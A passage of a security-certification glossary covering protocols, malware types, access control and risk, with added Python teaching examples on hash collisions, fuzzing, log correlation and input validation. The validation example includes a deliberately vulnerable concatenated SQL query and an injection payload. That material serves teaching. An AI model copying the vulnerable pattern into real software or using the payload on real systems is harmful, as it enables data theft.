is a secure file transfer protocol that runs over Secure Shell (SSH) on TCP port 22. Despite the name, it is a separate protocol from FTP and from FTPS rather than FTP with encryption added.

Public-Key Cryptography Standards (PKCS)

is a set of voluntary standards created by RSA and security leaders.

logic bomb

is a string of code embedded into an application or script that will execute in response to an event. The event might be a specific date or time, or a user action such as when a user launches a specific program.

remote access Trojan (RAT)

is a type of malware that allows attackers to take control of systems from remote locations. It is often delivered via drive-by downloads.

Ransomware

is a type of malware that takes control of a user's system or data. Criminals then attempt to extort payment from the victim. Ransomware often includes threats of damaging a user's system or data if the victim does not pay the ransom.

Host-based intrusion detection system (HIDS)

is additional software installed on a system such as a workstation or server. It provides protection to the individual host and can detect potential attacks and protect critical operating system files.

Online Certificate Status Protocol (OCSP)

is an Internet protocol used for obtaining the revocation status of an X.509 digital certificate. It is described in RFC 6960 and is on the Internet standards track. It was created as an alternative to certificate revocation lists (CRLs), specifically addressing certain problems associated with using CRLs in a public key infrastructure (PKI), such as their size and the delay before a revocation appears in them.

trusted operating system

meets a set of predetermined requirements, such as those identified in the Common Criteria. It uses the mandatory access control (MAC) model.

Principle of Least privilege

is a technical control implemented with access controls. Privileges are the rights and permissions assigned to authorized users. Least privilege specifies that individuals or processes are granted only those rights and permissions needed to perform their assigned tasks or functions, and nothing more.

File Transfer Protocol Secure (FTPS)

is an extension of FTP that uses TLS to encrypt FTP traffic. Implicit FTPS uses TCP ports 989 (data) and 990 (control); explicit FTPS negotiates TLS on the standard FTP control port 21 with the AUTH TLS command.

SAN (Subject Alternative Name) Certificate

is an extension to the X.509 specification that allows users to specify additional host names for a single SSL certificate. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common name.

OAuth

is an open standard for authorization many companies use to provide secure access to protected resources. Instead of creating a different account for each website you access, you can often use the same account that you've created with Google, Facebook, PayPal, Microsoft, or Twitter. Unlike SAML, it doesn't deal with authentication.

Certificate Authority (CA)

is an organization that is responsible for issuing, revoking, and distributing certificates.

Certificate Revocation List

is a signed list of revoked certificates that the issuing CA creates and publishes. By checking the CRL you can determine whether a particular certificate has been revoked before trusting it. The certificates for which a CRL is maintained are X.509 public key certificates, the format commonly used by PKI schemes.

Need-to-know principle

is similar to the principle of least privilege in that users are granted access only to the data and information that they need to know for their job. Notice that need to know is focused on data and information.

Spyware

is software installed on users' systems without their awareness or consent. Its purpose is often to monitor the user's computer and the user's activity.

Data sovereignty

is the concept that information which has been converted and stored in binary digital form is subject to the laws of the country in which it is located.

Risk management

is the practice of identifying, monitoring, and limiting risks to a manageable level.

Sideloading

is the process of installing software on an Android device from a source other than an authorized store.

Privilege escalation

occurs when an attacker gains rights beyond those intended, such as turning a normal user account into an admin account (vertical escalation) or using one user's access to reach another user's data (horizontal escalation).

adware

is software whose original intent was primarily to learn a user's habits for the purpose of targeted advertising. As the practice of gathering information on users became more malicious, more people began to call it spyware.

hacktivist

launches attacks as part of an activist movement or to further a cause.

Bluebugging

like bluesnarfing, but it goes a step further. In addition to gaining full access to the phone, the attacker installs a backdoor. The attacker can have the phone call the attacker at any time, allowing the attacker to listen in on conversations within a room.

virus

malicious code that attaches itself to a host application. The host application must be executed to run, and the malicious code executes when the host application is executed.

Network access control (NAC)

methods provide continuous security monitoring by inspecting computers and preventing them from accessing the network if they don't pass the inspection. NAC provides a measure of control for these other computers. It ensures that clients meet predetermined characteristics prior to accessing a network. NAC systems often use health as a metaphor, indicating that a client meets these predetermined characteristics, such as updates, anti-virus, and firewall.

Active reconnaissance (Pen Testing)

methods use tools such as network scanners to gain information on the target.

SDLC (Software Development Lifecycle)

models provide structure for software development projects.

Rooting

modifies an Android device, giving users root-level access to the device.

Intrusion Detection Systems (IDSs)

monitor a network and send alerts when they detect suspicious events on a system or network. Both IDSs and IPSs have the ability of detecting attacks using similar detection methods. The biggest difference is in their responses to an attack.

Network-based intrusion detection system (NIDS)

monitors activity on the network. An administrator installs NIDS sensors or collectors at chokepoints such as next to routers and firewalls. Because a switch only forwards frames to the port they are addressed to, the sensor is fed by a mirror (SPAN) port on the switch or by a network tap; the sensor's network interface card (NIC) is placed in promiscuous mode so that it accepts all frames, not just those addressed to it.

Buffer Overflow Attack

occurs when a program or process tries to store more data in a buffer (a temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information, which has to go somewhere, overflows into adjacent memory, corrupting or overwriting the valid data held there. Although it may occur accidentally through programming error, buffer overflow is a common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain code designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework (no bounds checking on arrays) and poor programming practices supplied the vulnerability.

Tailgating (also called piggybacking)

occurs when one user follows closely behind another user without using credentials.

Typo squatting (also called URL hijacking)

occurs when someone buys a domain name that is close to a legitimate domain name. People often do so for malicious purposes.

hash collision

occurs when a hashing algorithm produces the same hash from two different inputs, such as two different passwords. Birthday attacks exploit collisions: finding any two colliding inputs takes roughly the square root of the work needed to match one specific hash. Password attack.
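
The birthday bound in practice, as an added example that is not from the original card. It truncates SHA-256 to a few bits to stand in for a weak short hash (the truncation and the message prefix are constructed for the example), finds a collision by the birthday method, and compares the attempt count with the 2^(n/2) estimate:

```python
"""Added example: birthday attack on a hash truncated to n bits. SHA-256 is
truncated only to make the search finish quickly; the prefix is constructed."""
import hashlib
import itertools
import math

def truncated_hash(data: bytes, bits: int) -> int:
    """Leading `bits` bits of SHA-256, standing in for a weak short hash."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)

def find_collision(bits: int, prefix: bytes = b"msg-"):
    """Birthday search: hash candidate messages until any two share a value.
    Returns (first message, second message, attempts)."""
    seen = {}
    for i in itertools.count():
        msg = prefix + str(i).encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg

def find_second_preimage(target: bytes, bits: int, limit: int, prefix: bytes = b"msg-"):
    """Chosen-target search: must match one specific value, so it needs about
    2^bits attempts on average. Capped by `limit` so the demo terminates."""
    want = truncated_hash(target, bits)
    for i in range(limit):
        msg = prefix + str(i).encode()
        if msg != target and truncated_hash(msg, bits) == want:
            return msg, i + 1
    return None, limit

def expected_birthday_attempts(bits: int) -> float:
    """Expected number of random samples before the first repeat in 2^bits values."""
    return math.sqrt(math.pi / 2 * 2 ** bits)

if __name__ == "__main__":
    bits = 24
    a, b, n = find_collision(bits)
    print(f"collision after {n} attempts (expected ~{expected_birthday_attempts(bits):.0f}):")
    print(f"  {a!r} and {b!r} both hash to {truncated_hash(a, bits):#x}")
    print(f"matching one chosen target would take ~{2 ** bits} attempts on average")
```

For a 24-bit hash the collision turns up after a few thousand attempts while a targeted match needs around sixteen million; the gap is why a hash needs twice the bits of security you want against collisions, and why a 128-bit digest like MD5 only ever offered 64-bit collision resistance even before its structural breaks.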

IRP Definitions

are the part of an incident response plan that defines incident types and severities, so that personnel agree on what counts as an incident and how it is classified before one occurs.

Cipher locks

often have four or five buttons labeled with numbers. ▪ One challenge with cipher locks is that they don't identify the users.

Secure / Multipurpose Internet Mail Extensions( S/MIME)

one of the most popular standards used to digitally sign and encrypt email.

Protecting Data

one of the most valuable resources any organization manages, second only to its people. The primary methods of protecting the confidentiality of data are with encryption and strong access controls. Database column encryption protects individual fields within a database.

Internet Protocol security (IPsec) Transport mode

only encrypts the payload, leaving the original IP header visible, and is commonly used for host-to-host traffic within private networks rather than for site-to-site VPNs across the Internet. If traffic is transmitted and used only within a private network, there isn't any need to hide the internal IP addresses by encrypting them.

split tunnel (VPN)

only encrypts traffic destined for the VPN's private network.

Job rotation

policies require employees to change roles on a regular basis. Employees might change roles temporarily, such as for three to four weeks, or permanently. ▪ This helps ensure that employees cannot continue with fraudulent activity indefinitely.

bring your own device (BYOD)

policy allows employees to connect their own personal devices to the corporate network.

choose your own device (CYOD)

policy provides a list of approved devices. Employees with a device on the list can connect them to the network.

Time of Day Restrictions

prevent users from logging on during restricted times. They also prevent logged-on users from accessing resources during certain times. Location- based policies restrict access based on the location of the user.

Separation of duties

prevents any single person or entity from controlling all the functions of a critical or sensitive process by dividing the tasks between employees. ▪ This helps prevent potential fraud, such as if a single person prints and signs checks.

Faraday cage

prevents signals from emanating beyond the cage.

Public Cloud

promotes massive, global, and industrywide applications offered to the general public

flood guards

protect against MAC flood attacks. When enabled, the switch will limit the amount of memory used to store MAC addresses for each port.

Cable troughs

protect cables distributed throughout a building in metal containers.

Transport Layer Security (TLS)

protocol is the designated replacement for SSL and should be used instead of SSL; both are used to encrypt data in transit. TLS requires a certificate, typically issued by a Certificate Authority (CA), to authenticate the server. TLS encrypts HTTPS traffic, but it can also encrypt other traffic, such as SMTP, LDAP, and FTP.

Secure Sockets Layer (SSL)

protocol was the primary method used to secure HTTP traffic as Hypertext Transfer Protocol Secure (HTTPS). All SSL versions are now deprecated because of known weaknesses; TLS is the replacement and should be used instead. Both rely on certificates issued by Certificate Authorities (CAs).

Higher-tonnage HVAC systems

provide more cooling capacity. This keeps server rooms at lower operating temperatures and results in fewer failures. HVAC systems increase availability by controlling temperature and humidity. HVAC systems should be integrated with the fire alarm systems and either have dampers or the ability to be turned off in the event of a fire.

Functional exercises

provide personnel with an opportunity to test the plans in a simulated operational environment.

Host-based firewalls

provide protection for individual hosts, such as servers or workstations, by filtering traffic to and from that host. A host-based firewall provides intrusion protection for the host. Linux systems provide iptables and nftables (built on the kernel's netfilter framework, of which xtables is a part) for firewall capabilities.

Web application firewalls

provide strong protection for web servers. They protect against several different types of attacks, with a focus on web application attacks and can include load-balancing features.

Barricades

provide stronger barriers than fences and attempt to deter attackers.

Mean Time Between Failures (MTBF)

provides a measure of a system's reliability and is usually represented in hours.

backdoor

provides another way to access a system. Many types of malware create backdoors, allowing attackers to access systems from remote locations. Employees have also created backdoors in applications and systems.

Secure Real-time Transport Protocol (SRTP)

provides encryption, message authentication, and integrity for RTP.

Incident Response Plan (IRP)

provides more detail than the incident response policy. It provides organizations with a formal, coordinated plan personnel can use when responding to an incident.

Video surveillance

provides reliable proof of a person's location and activity. It can identify who enters and exits secure areas and can record theft of assets. ▪ Cameras are connected to a closed-circuit television (CCTV) system, which transmits signals from video cameras to monitors that are similar to TVs.

Virtual Private Network (VPN)

provides remote access to a private network via a public network.

Cryptography

provides two primary security methods you can use with email: digital signatures and encryption. There are times when you want to ensure that email messages are only readable by authorized users. ▪ You can encrypt an email and just as any other time encryption is used, encryption provides confidentiality.

Risk Assessment

quantifies or qualifies risks based on different values or judgments, using quantitative or qualitative measurements. A risk assessment is a point-in-time assessment, or a snapshot. ▪ In other words, it assesses the risks based on current conditions, such as current threats, vulnerabilities, and existing controls.

Intrusion Prevention Systems (IPSs)

react to attacks in progress and prevent them from reaching systems and networks. Both IDSs and IPSs have the ability of detecting attacks using similar detection methods. The biggest difference is in their responses to an attack.

POP3

receives email on TCP port 110 ▪ Encrypts with SSL or TLS on TCP port 995.

IMAP4

receives email on TCP port 143 ▪ Encrypts with SSL or TLS on TCP port 993.

Logs

record what happened, when it happened, where it happened, and who did it. ▪ By monitoring logs, administrators can detect event anomalies. Additionally, by reviewing logs, security personnel can create an audit trail.

Usage auditing

records user activity in logs. A usage auditing review looks at the logs to see what users are doing and it can be used to re-create an audit trail.

Humidity controls

reduce the potential for damage from electrostatic discharge and damage from condensation.

Internal threat

refers to threats from people inside an organization, such as employees or contractors, whether malicious or merely careless.

SSL/ TLS accelerators

refer to hardware devices focused on handling Transport Layer Security (TLS) traffic.

High availability

refers to a system or service that needs to remain operational with almost zero downtime.

Cloud computing

refers to accessing computing resources via a different location than your local computer. In most scenarios, you're accessing these resources through the Internet.

Normalization of a database

refers to organizing the tables and columns to reduce redundant data and improve overall database performance.

Wiping

refers to the process of completely removing all remnants of data on a disk. A disk wiping tool might use a bit-level overwrite process that writes different patterns of 1s and 0s multiple times to ensures that the data on the disk is unreadable.

Bluesnarfing

refers to the unauthorized access to, or theft of information from, a Bluetooth device.

Jailbreaking

removes all software restrictions from an Apple device.

Mandatory vacation policies

require employees to take time away from their job. These policies help to deter fraud and discover malicious activities while the employee is away.

Gramm-Leach Bliley Act (GLBA)

requires financial institutions to provide consumers with a privacy notice explaining what information they collect and how that information is used.

Sarbanes-Oxley Act (SOX)

requires that executives within an organization take individual responsibility for the accuracy of financial reports. It also includes specifics related to auditing, and identifies penalties to individuals for noncompliance.

clean desk policy

requires users to organize their areas to reduce the risk of possible data theft. It reminds users to secure sensitive data and may include a statement about not writing down passwords.

Domain Name System (DNS)

resolves host names to IP addresses. DNS uses TCP port 53 for zone transfers and UDP port 53 for DNS client queries. Most Internet-based DNS servers run BIND software on Unix or Linux servers, and it's common to configure DNS servers to only use secure zone transfers.

Recovery (Incident Response Process)

returns a system to normal operation.

Permission auditing

reviews help ensure that users have only the access they need and no more and can detect privilege creep issues.

Credentialed scans

run under the context of a valid account and are typically more accurate than non-credentialed scans.

Cross-site request forgery (XSRF)

causes a user's browser to perform actions on a web site where the user is already authenticated, such as making purchases or changing account details, without the user's knowledge. The site cannot tell the forged request from a real one because the browser attaches the user's session cookie automatically. Anti-forgery tokens and the SameSite cookie attribute are the usual defenses.

worm

self-replicating malware that travels throughout a network without the assistance of a host application or user interaction. A worm resides in memory and can use different transport protocols to travel over the network.

Fuzzing techniques

send random or malformed data to applications looking for vulnerabilities. Fuzzing is a software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failed validation, or memory leaks.
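
A minimal mutation fuzzer and what it finds, as an added example that is not from the original card. The target is a constructed parser for a length-prefixed record format with a deliberate bounds bug (it trusts the count byte and indexes past the end of the input); the fuzzer mutates a valid seed, treats `ValueError` as the parser's documented error, and reports anything else as a crash. The fixed parser is run through the same fuzzer to show that it survives:

```python
"""Added example: a mutation fuzzer against a constructed record parser with a
deliberate bounds bug, plus the fixed parser. Format and seed are constructed."""
import random

def parse_records(data: bytes) -> list:
    """Buggy: trusts the count byte and indexes past the end of the input.
    Format: [count][len][value bytes]... (all lengths are single bytes)."""
    count = data[0]
    pos, records = 1, []
    for _ in range(count):
        length = data[pos]                    # IndexError on truncated input (the bug)
        value = data[pos + 1: pos + 1 + length]
        if len(value) != length:
            raise ValueError("short record")  # the error callers are told to expect
        records.append(value)
        pos += 1 + length
    return records

def parse_records_fixed(data: bytes) -> list:
    """Bounds-checked version: every malformed input becomes a ValueError."""
    if not data:
        raise ValueError("empty input")
    count = data[0]
    pos, records = 1, []
    for _ in range(count):
        if pos >= len(data):
            raise ValueError("truncated header")
        length = data[pos]
        value = data[pos + 1: pos + 1 + length]
        if len(value) != length:
            raise ValueError("short record")
        records.append(value)
        pos += 1 + length
    return records

def mutate(rng: random.Random, data: bytes) -> bytes:
    """One random mutation: bit flip, byte overwrite, insert, delete, or truncate."""
    buf = bytearray(data)
    op = rng.randrange(5)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 2:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif op == 3 and buf:
        del buf[rng.randrange(len(buf))]
    else:
        buf = buf[: rng.randrange(len(buf) + 1)]
    return bytes(buf)

def fuzz(target, seed: bytes, iterations: int = 2000, rng_seed: int = 1,
         expected=(ValueError,)):
    """Feed mutated inputs to target; collect inputs that raise anything other
    than the documented error types. A fixed RNG seed makes runs reproducible."""
    rng = random.Random(rng_seed)
    crashes = []
    for _ in range(iterations):
        sample = mutate(rng, seed)
        try:
            target(sample)
        except expected:
            pass
        except Exception as exc:
            crashes.append((sample, type(exc).__name__))
    return crashes

SEED = b"\x02\x03abc\x02de"   # constructed valid input: two records, b"abc" and b"de"

if __name__ == "__main__":
    found = fuzz(parse_records, SEED)
    print(f"buggy parser: {len(found)} crashing inputs, e.g. {found[0] if found else None}")
    print(f"fixed parser: {len(fuzz(parse_records_fixed, SEED))} crashing inputs")
```

The oracle matters as much as the mutations: a fuzzer that only looks for a hard crash misses logic bugs, while one that flags every exception drowns in the parser's own error handling. Here the contract "malformed input raises `ValueError`" is the oracle, and anything else is a finding.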

Virtual local area networks (VLANs)

separate or segment traffic on physical networks. You can create multiple VLANs with a single Layer 3 switch. A VLAN can logically group several different computers together, or logically separate computers, without regard to their physical location. VLANs are also used to separate traffic types, such as voice traffic on VLAN and data traffic on a separate VLAN.

Community Cloud

serves a specific community with common business models, security requirements, and compliance considerations

Private Cloud

serves only one customer or organization and can be located on the customer's premises or off the customer's premises

Backup media

should be protected with the same level of protection as the data in the backup.

arp -a

shows the ARP cache on windows.

Signature-based antivirus

software detects known malware based on signature definitions.

physical security control

something you can physically touch, such as a hardware lock, a fence, an identification badge, and a security camera... Perimeter, Buildings, Secure work areas, Server and network rooms, Hardware, Airgap, and Signs.

disablement policy

specifies how to manage accounts in different situations. For example, most organizations require administrators to disable user accounts as soon as possible when employees leave the organization.

Incident response procedures

start with preparation to prepare for and prevent incidents.

Switch loop protection

such as STP (Spanning Tree Protocol) or RSTP (Rapid) is necessary to protect against switching loop problems, such as those caused when two ports of a switch are connected together.

security information and event management (SIEM)

system provides a centralized solution for collecting, analyzing, and managing data from multiple sources. It typically includes aggregation and correlation capabilities to collect and organize log data from multiple sources. It also provides continuous monitoring with automated alerts and triggers.
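
What aggregation, correlation, and an automated alert look like at the smallest scale, as an added example that is not from the original card (it also illustrates the audit-trail use of logs described above). The sshd-style log lines are constructed, including one that arrives out of order; the detection rule counts failed logins per source address in a sliding window and then correlates each alert with any later successful login from the same address:

```python
"""Added example: SIEM-style aggregation and correlation over constructed sshd
log lines. Thresholds and the log format are assumptions for the example."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines (ISO timestamps; one line deliberately out of order).
LOG_LINES = """\
2024-05-01T10:00:01 bastion sshd[2011]: Failed password for root from 203.0.113.7 port 50211 ssh2
2024-05-01T10:00:09 bastion sshd[2012]: Failed password for admin from 203.0.113.7 port 50212 ssh2
2024-05-01T10:00:17 bastion sshd[2013]: Failed password for invalid user test from 203.0.113.7 port 50213 ssh2
2024-05-01T10:00:30 bastion sshd[2014]: Failed password for bob from 198.51.100.9 port 40000 ssh2
2024-05-01T10:00:26 bastion sshd[2015]: Failed password for alice from 203.0.113.7 port 50214 ssh2
2024-05-01T10:00:41 bastion sshd[2016]: Failed password for alice from 203.0.113.7 port 50215 ssh2
2024-05-01T10:01:05 bastion sshd[2019]: Accepted password for alice from 203.0.113.7 port 50217 ssh2
2024-05-01T10:07:30 bastion sshd[2031]: Failed password for bob from 198.51.100.9 port 40001 ssh2
2024-05-01T10:09:00 bastion sshd[2040]: Accepted password for carol from 192.0.2.44 port 41000 ssh2
""".splitlines()

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_events(lines):
    """Normalize raw lines into structured events; lines that don't match are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Alert when one source has >= threshold failures inside the window, then
    correlate: did that source log in successfully afterwards?"""
    recent = defaultdict(deque)   # source ip -> timestamps of recent failures
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):   # correlation needs time order
        ip = ev["ip"]
        if ev["result"] == "Failed":
            q = recent[ip]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "failures": len(q), "first": q[0],
                              "last": ev["ts"], "success_as": None}
        elif ip in alerts and alerts[ip]["success_as"] is None:
            alerts[ip]["success_as"] = ev["user"]   # brute force followed by success
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(LOG_LINES)):
        print(alert)
```

The second source (198.51.100.9) fails twice seven minutes apart and stays below the threshold; the first crosses it in forty seconds and then succeeds as `alice`, which is the correlation that turns a noisy "many failures" alert into an incident worth a response.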

Heating, ventilation, and air conditioning (HVAC)

systems are important physical security controls that enhance the availability of systems.

Zero-day exploits

take advantage of vulnerabilities that aren't known by trusted sources, such as operating system vendors and antivirus vendors..

Session hijacking

takes advantage of session IDs stored in cookies. When a user logs on to a web site, the web site often returns a small text file (called a cookie) with a session ID. In a session hijacking attack, the attacker utilizes the user's session ID to impersonate the user.

Whaling

targets high-level executives.

Data loss prevention (DLP)

techniques and technologies can block the use of USB devices to prevent data loss and monitor outgoing email traffic for unauthorized data transfers.

IV attacks

the attacker uses packet injection techniques to add additional packets into the data stream. The AP responds with more packets, increasing the probability that an initialization vector (IV) will be reused; WEP's 24-bit IV is small enough that repeats are inevitable. An IV attack using packet injection reduces the time it takes to crack a WEP key to a very short time, sometimes less than a minute. WEP should never be used.

Overwriting/Flashing

the firmware on an Android device with custom firmware is another way to root an Android device.

spear phishing

the fraudulent practice of sending emails ostensibly from a known or trusted sender in order to induce targeted individuals to reveal confidential information. this attack targets specific groups of users. It could target employees within a company or customers of a company. Digital signatures provide assurances to recipients about who sent an email, and can reduce the success of spear phishing.

Input validation

the practice of checking data for validity before using it. Input validation prevents an attacker from sending malicious input that an application will act on, either by rejecting the input or by sanitizing it to remove dangerous content. ▪ Input validation includes verifying that only required characters, ranges, or values are used. It can also block HTML and prevent the use of certain characters such as dashes or apostrophes. ▪ The lack of input validation is one of the most common security issues in web-based applications. ▪ There are two places to validate: client-side and server-side. Client-side validation only improves the user experience, because an attacker can bypass the browser entirely, so server-side validation is the one that counts. ▪ Input validation protects against many attacks, such as buffer overflow, SQL injection, command injection, and cross-site scripting (XSS); poor input validation increases exposure to major software exploits.
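
Server-side allow-list validation shown next to the SQL injection it stops, as an added example that is not from the original card. The SQLite database, its two rows, and the username and quantity rules are constructed for the example; the point is that validation and a parameterized query are two independent layers, and that the lookup which builds its SQL by string concatenation is the one the injection payload defeats:

```python
"""Added example: allow-list input validation beside the SQL injection it
prevents. In-memory SQLite with constructed rows; field rules are assumptions."""
import re
import sqlite3

# Allow-list: describe what valid input looks like, not what attacks look like.
USERNAME = re.compile(r"[a-z][a-z0-9_]{2,31}")

def validate_username(raw) -> str:
    """Reject rather than sanitize: return the value only if it is well-formed."""
    if not isinstance(raw, str) or not USERNAME.fullmatch(raw):
        raise ValueError(f"invalid username: {raw!r}")
    return raw

def validate_quantity(raw, low: int = 1, high: int = 100) -> int:
    """Range check for a numeric field; the str -> int conversion is part of validation."""
    try:
        value = int(raw, 10)
    except (TypeError, ValueError):
        raise ValueError(f"not an integer: {raw!r}")
    if not low <= value <= high:
        raise ValueError(f"out of range: {value}")
    return value

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return db

def lookup_vulnerable(db, name):
    """String concatenation: the input becomes part of the SQL text."""
    return db.execute(f"SELECT name, email FROM users WHERE name = '{name}'").fetchall()

def lookup_parameterized(db, name):
    """Parameter binding alone: the input can only ever be a value, never SQL."""
    return db.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()

def lookup_safe(db, name):
    """Validation first, then the parameterized query: defense in depth."""
    return lookup_parameterized(db, validate_username(name))

if __name__ == "__main__":
    db = build_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))      # dumps every row
    print("parameterized:", lookup_parameterized(db, payload))  # []
    try:
        lookup_safe(db, payload)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation is not a substitute for parameter binding (a legitimate value such as `o'brien` would need escaping for the vulnerable query, but no validation rule fixes that), and binding is not a substitute for validation (it says nothing about whether a quantity of 99999 makes sense). Each layer catches what the other does not.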

Tailgating

the practice of one person following closely behind another without showing credentials. Use a mantrap to solve tailgating.

Phishing

the practice of sending email to users with the purpose of tricking them into revealing personal information or clicking on a link. A phishing attack often sends the user to a malicious web site that appears to the user as a legitimate site.

Bluejacking

the practice of sending unsolicited messages to nearby Bluetooth devices.

Onboarding

the process of granting individuals access to an organization's computing resources after being hired. ▪ This includes providing the employee with a user account and granting access to appropriate resources.

Pulverizing

the process of physically destroying media to sanitize it, such as with a sledge hammer (and safety goggles).

Pivoting (Pen Testing)

the process of using an exploited system to target other systems.

Data exfiltration

the unauthorized transfer of data out of a network.

Sandboxing

the use of an isolated area and it is often used for testing. You can create a sandbox with a virtual machine (VM) and on Linux systems with the chroot command. A secure deployment environment includes development, testing, staging, and production elements.

Public-Key Infrastructure X.509 (PKIX)

the working group formed by the IETF to develop standards and models for the PKI environment. The X.509 standard defines the certificate formats and fields for public keys. It also defines the procedures that should be used to distribute public keys.

Authentication Header (AH)

allows each host in an IPsec conversation to authenticate to the other before exchanging data. AH provides authentication and integrity for the whole packet but no confidentiality; it is identified by IP protocol ID 51, whereas ESP uses protocol ID 50.

Version control

tracks the versions of software as it is updated, including who made the update and when.

Security awareness

training programs reinforce user compliance with security policies and help reduce risks posed by users.

Clickjacking

tricks users into clicking something other than what they think they're clicking.

privacy threshold assessment

typically a simple questionnaire completed by system or data owners. ▪ It helps identify if a system processes data that exceeds the threshold for PII. ▪ If the system processes PII, a privacy impact assessment helps identify and reduce risks related to potential loss of the PII.

Spoofing attacks

typically change data to impersonate another system or person. ▪ MAC spoofing attacks change the source MAC address ▪ IP spoofing attacks change the source IP address.

Non-regulatory Framework

typically identifies common standards and best practices that organizations can follow.

Industrial control system (ICS)

typically refers to systems within large facilities such as power plants or water treatment facilities. An ICS is often controlled by a supervisory control and data acquisition (SCADA) system. Ideally, these systems are contained within isolated networks, such as within a virtual local area network (VLAN), that do not have access to the Internet. If they are connected to the corporate network, they are often protected by a network intrusion prevention system (NIPS) to block unwanted traffic.

Spam

unwanted or unsolicited email. Some spam is harmless advertisements, while much more is malicious. Spam can include malicious links, malicious code, or malicious attachments.

File Transfer Protocol (FTP)

uploads and downloads large files to and from an FTP server. By default, FTP transmits data in cleartext. Uses TCP ports 20/21.

Dictionary attacks

use a file of words and common passwords to guess a password. ▪ Account lockout policies help protect against brute force attacks and complex passwords thwart dictionary attacks. Password Attack

Symmetric algorithms

use a key to encrypt data and require the same key to decrypt that data.

Qualitative measurements (Risk Assessment)

use judgments. Both methods have the same core goal of helping management make educated decisions based on priorities.

Quantitative measurements (Risk Assessment)

use numbers, such as a monetary figure representing cost and asset values. Both methods have the same core goal of helping management make educated decisions based on priorities.

HTTP and HTTPS

use ports 80 and 443 and transmit data over the Internet in unencrypted and encrypted formats, respectively.

Asymmetric algorithms

use two keys: one key to encrypt data and a different, mathematically related key to decrypt it.

non-disclosure agreement (NDA)

used between two entities to ensure that proprietary data is not disclosed to unauthorized entities.

Unified Extensible Firmware Interface (UEFI)

used in modern systems instead of a BIOS. UEFI performs many of the same functions as BIOS, but provides some enhancements. Both BIOS and UEFI can be upgraded using a process called flashing. Flashing overwrites the software within the chip with newer software.

Public key

used to encrypt the data which is then decrypted with the private key.

Private key

used to sign data (by encrypting a hash of it) so that anyone holding the matching public key can verify the signature; this is the basis of digital signatures. The private key is never shared.

Microsoft CHAP (MS-CHAP)

uses MD4 hash and Microsoft Point-to-Point encryption (MPPE). This is the Microsoft implementation of CHAP, which is used only by Microsoft clients.

Trivial File Transfer Protocol (TFTP)

uses UDP port 69 and is used to transfer smaller amounts of data, such as when communicating with network devices.

Layered security or defense-in-depth practices

uses control diversity, implementing administrative, technical, and physical security controls. Vendor diversity utilizes controls from different vendors. User training informs users of threats, helping them avoid common attacks.

qualitative risk assessment

uses judgment to categorize risks based on likelihood of occurrence (or probability) and impact. Some qualitative risk assessments use surveys or focus groups. One of the challenges with a qualitative risk assessment is gaining consensus on the probability and impact.

Waterfall

uses multiple stages going from top to bottom, with each stage feeding the next stage.

Passive reconnaissance (Pen Testing)

uses open-source intelligence methods, such as social media and an organization's web site.

Role-based access control (role-BAC)

uses roles to manage rights and permissions for users. This is useful for users within a specific department who perform the same job functions. A role-BAC model uses roles based on jobs and functions. A matrix is a planning document that matches the roles with the required privileges. This type of group-based access control, where access is based on roles or groups, simplifies user administration. Group-based privilege control reduces the administrative workload of access management. Administrators put user accounts into security groups, and assign privileges to the groups. Users within a group automatically inherit the privileges assigned to the group.

Rule-based access control (rule-BAC)

uses rules to control access. The most common example is the rules in an access control list on routers or firewalls. However, more advanced implementations cause rules to trigger within applications as well. Rule-based access control is based on a set of approved instructions, such as an access control list. Some rule-BAC systems use rules that trigger in response to an event, such as modifying ACLs after detecting an attack or granting additional permissions to a user in certain situations.

Social engineering

uses social tactics to trick users into giving up information or performing actions they wouldn't normally take. Social engineering attacks can occur in person, over the phone, while surfing the Internet, or via email.

Network scanners

use various techniques to gather information about hosts within a network: ping scans, port scans, service scans, and operating system (OS) detection techniques.

SDN (Software Defined Network)

uses virtualization technologies to route traffic instead of using hardware routers and switches. More specifically, an SDN separates the data planes and control planes within a network.

Jamming attack

usually prevents all users from connecting to a wireless network using a wireless jammer.

Digital Signatures

validate the integrity of the message and its sender.

Testing

validates business continuity plans.

Stress testing

verifies an application can handle a load.

service scan

verifies the protocol or service. (A network scanner technique.)

false negative

occurs when an attacker is actively attacking the network, but the system does not detect and report it.

Dumpster diving

when a threat actor searches through trash looking for information. Shredding or burning documents mitigates this threat.

Race condition

when two or more modules of an application, or two or more applications, attempt to access a resource at the same time.

cold site

will have power and connectivity needed for a recovery site, but little else. Cold sites are the least expensive and the hardest to test.

Key data roles

